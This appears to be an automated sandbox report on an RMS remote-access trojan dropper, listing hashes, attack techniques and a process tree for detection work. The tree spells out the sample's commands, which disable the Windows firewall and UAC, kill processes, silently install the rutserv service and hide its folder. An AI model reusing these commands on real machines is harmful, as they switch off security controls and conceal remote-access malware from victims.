rms | 52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c

Analysis

max time kernel
156s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
26-03-2022 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
Size

21.3MB
MD5

591b70bb39ae6201841a62b12d0dd2d8
SHA1

fb9eef4e415956063bc59d8c7b0a9ca487ce1015
SHA256

52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c
SHA512

53ea11e218fbb6d4800212e9f46287e5fe7227ade5f119404cdb2e26801321c079d81b15ccfc0dcd7bd83c6d7039b242d54e655c3ecdce9418727b97059009d8

Score

10^/10

rms evasion rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Executes dropped EXE 7 IoCs

pid	Process
5108	rutserv.exe
4128	rutserv.exe
1800	rutserv.exe
1208	rutserv.exe
1888	rfusclient.exe
3444	rfusclient.exe
4244	rfusclient.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\System64\install.bat	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
File opened for modification	C:\Windows\System64\install.bat	attrib.exe
File created	C:\Windows\System64\rfusclient.exe	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
File created	C:\Windows\System64\rutserv.exe	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
File created	C:\Windows\System64\vp8encoder.dll	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
File created	C:\Windows\System64\vp8decoder.dll	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
File created	C:\Windows\System64\regedit.reg	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4532	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
1744	taskkill.exe
3196	taskkill.exe
4960	taskkill.exe
212	taskkill.exe
3616	taskkill.exe
3528	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3668	reg.exe

Runs .reg file with regedit 1 IoCs

pid	Process
4252	regedit.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
5108	rutserv.exe
5108	rutserv.exe
5108	rutserv.exe
5108	rutserv.exe
5108	rutserv.exe
5108	rutserv.exe
4128	rutserv.exe
4128	rutserv.exe
1800	rutserv.exe
1800	rutserv.exe
1208	rutserv.exe
1208	rutserv.exe
1208	rutserv.exe
1208	rutserv.exe
1208	rutserv.exe
1208	rutserv.exe
1888	rfusclient.exe
1888	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4244	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeShutdownPrivilege	688	powercfg.exe
Token: SeCreatePagefilePrivilege	688	powercfg.exe
Token: SeShutdownPrivilege	688	powercfg.exe
Token: SeCreatePagefilePrivilege	688	powercfg.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	3196	taskkill.exe
Token: SeDebugPrivilege	4960	taskkill.exe
Token: SeDebugPrivilege	212	taskkill.exe
Token: SeDebugPrivilege	3616	taskkill.exe
Token: SeDebugPrivilege	3528	taskkill.exe
Token: SeDebugPrivilege	5108	rutserv.exe
Token: SeDebugPrivilege	1800	rutserv.exe
Token: SeTakeOwnershipPrivilege	1208	rutserv.exe
Token: SeTcbPrivilege	1208	rutserv.exe
Token: SeTcbPrivilege	1208	rutserv.exe
Token: SeBackupPrivilege	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
5108	rutserv.exe
4128	rutserv.exe
1800	rutserv.exe
1208	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2436	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	83
PID 2532 wrote to memory of 2436	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	83
PID 2532 wrote to memory of 2436	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	83
PID 2532 wrote to memory of 2732	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	84
PID 2532 wrote to memory of 2732	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	84
PID 2532 wrote to memory of 2732	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	84
PID 2532 wrote to memory of 3668	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	85
PID 2532 wrote to memory of 3668	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	85
PID 2532 wrote to memory of 3668	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	85
PID 2532 wrote to memory of 688	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	87
PID 2532 wrote to memory of 688	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	87
PID 2532 wrote to memory of 688	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	87
PID 2532 wrote to memory of 4372	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	91
PID 2532 wrote to memory of 4372	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	91
PID 2532 wrote to memory of 4372	2532	52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe	91
PID 4372 wrote to memory of 2312	4372	cmd.exe	93
PID 4372 wrote to memory of 2312	4372	cmd.exe	93
PID 4372 wrote to memory of 2312	4372	cmd.exe	93
PID 4372 wrote to memory of 1744	4372	cmd.exe	94
PID 4372 wrote to memory of 1744	4372	cmd.exe	94
PID 4372 wrote to memory of 1744	4372	cmd.exe	94
PID 4372 wrote to memory of 3196	4372	cmd.exe	96
PID 4372 wrote to memory of 3196	4372	cmd.exe	96
PID 4372 wrote to memory of 3196	4372	cmd.exe	96
PID 4372 wrote to memory of 4960	4372	cmd.exe	97
PID 4372 wrote to memory of 4960	4372	cmd.exe	97
PID 4372 wrote to memory of 4960	4372	cmd.exe	97
PID 4372 wrote to memory of 212	4372	cmd.exe	98
PID 4372 wrote to memory of 212	4372	cmd.exe	98
PID 4372 wrote to memory of 212	4372	cmd.exe	98
PID 4372 wrote to memory of 3616	4372	cmd.exe	99
PID 4372 wrote to memory of 3616	4372	cmd.exe	99
PID 4372 wrote to memory of 3616	4372	cmd.exe	99
PID 4372 wrote to memory of 3528	4372	cmd.exe	100
PID 4372 wrote to memory of 3528	4372	cmd.exe	100
PID 4372 wrote to memory of 3528	4372	cmd.exe	100
PID 4372 wrote to memory of 3228	4372	cmd.exe	101
PID 4372 wrote to memory of 3228	4372	cmd.exe	101
PID 4372 wrote to memory of 3228	4372	cmd.exe	101
PID 4372 wrote to memory of 4352	4372	cmd.exe	102
PID 4372 wrote to memory of 4352	4372	cmd.exe	102
PID 4372 wrote to memory of 4352	4372	cmd.exe	102
PID 4372 wrote to memory of 4252	4372	cmd.exe	103
PID 4372 wrote to memory of 4252	4372	cmd.exe	103
PID 4372 wrote to memory of 4252	4372	cmd.exe	103
PID 4372 wrote to memory of 4532	4372	cmd.exe	104
PID 4372 wrote to memory of 4532	4372	cmd.exe	104
PID 4372 wrote to memory of 4532	4372	cmd.exe	104
PID 4372 wrote to memory of 5108	4372	cmd.exe	107
PID 4372 wrote to memory of 5108	4372	cmd.exe	107
PID 4372 wrote to memory of 5108	4372	cmd.exe	107
PID 4372 wrote to memory of 4128	4372	cmd.exe	108
PID 4372 wrote to memory of 4128	4372	cmd.exe	108
PID 4372 wrote to memory of 4128	4372	cmd.exe	108
PID 4372 wrote to memory of 1800	4372	cmd.exe	111
PID 4372 wrote to memory of 1800	4372	cmd.exe	111
PID 4372 wrote to memory of 1800	4372	cmd.exe	111
PID 1208 wrote to memory of 1888	1208	rutserv.exe	113
PID 1208 wrote to memory of 1888	1208	rutserv.exe	113
PID 1208 wrote to memory of 1888	1208	rutserv.exe	113
PID 1208 wrote to memory of 3444	1208	rutserv.exe	114
PID 1208 wrote to memory of 3444	1208	rutserv.exe	114
PID 1208 wrote to memory of 3444	1208	rutserv.exe	114
PID 4372 wrote to memory of 5032	4372	cmd.exe	118

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2312	attrib.exe
5032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe
"C:\Users\Admin\AppData\Local\Temp\52271a574f4c52f112b22d9a13c8a63924c069cb311a64ce58382e497f81602c.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall set opmode mode=disable
  2⤵
  PID:2436
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall set allprofiles state off
  2⤵
  PID:2732
- C:\Windows\SysWOW64\reg.exe
  reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - Modifies registry key
  PID:3668
- C:\Windows\SysWOW64\powercfg.exe
  powercfg.exe -h off
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\System64\install.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r -a -s -h "C:\Windows\System64\install.bat" /S /D
    3⤵
    - Drops file in Windows directory
    - Views/modifies file attributes
    PID:2312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rutserv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rfusclient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rfusclient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rutserv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:212
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rfusclient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rfusclient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3528
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SYSTEM\System Corporation Update" /f
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "regedit.reg"
    3⤵
    - Runs .reg file with regedit
    PID:4252
- - C:\Windows\SysWOW64\timeout.exe
    timeout 2
    3⤵
    - Delays execution with timeout.exe
    PID:4532
- - C:\Windows\System64\rutserv.exe
    rutserv.exe /silentinstall
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:5108
- - C:\Windows\System64\rutserv.exe
    rutserv.exe /firewall
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:4128
- - C:\Windows\System64\rutserv.exe
    rutserv.exe /start
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1800
- - C:\Windows\SysWOW64\attrib.exe
    attrib +r +a +s +h "C:\Windows\System64" /S /D
    3⤵
    - Views/modifies file attributes
    PID:5032

C:\Windows\System64\rutserv.exe
C:\Windows\System64\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Windows\System64\rfusclient.exe
  C:\Windows\System64\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1888
- - C:\Windows\System64\rfusclient.exe
    C:\Windows\System64\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:4244
- C:\Windows\System64\rfusclient.exe
  C:\Windows\System64\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:3444